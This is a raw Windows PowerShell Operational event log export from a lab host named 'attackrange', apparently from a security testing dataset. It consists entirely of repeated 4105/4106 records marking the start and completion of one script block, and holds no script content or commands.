EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471555
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471554
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471553
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471552
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471551
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471550
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471549
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471548
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471547
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471546
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471545
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471544
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471543
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471542
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471541
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471540
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471539
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471538
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471537
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471536
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471535
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471534
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471533
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471532
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471531
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471530
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471529
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471528
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471527
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471526
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471525
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471524
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471523
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471522
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471521
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471520
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471519
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471518
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471517
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471516
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471515
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471514
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471513
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471512
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471511
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471510
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471509
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471508
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471507
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471506
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471505
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471504
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471503
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471502
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471501
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
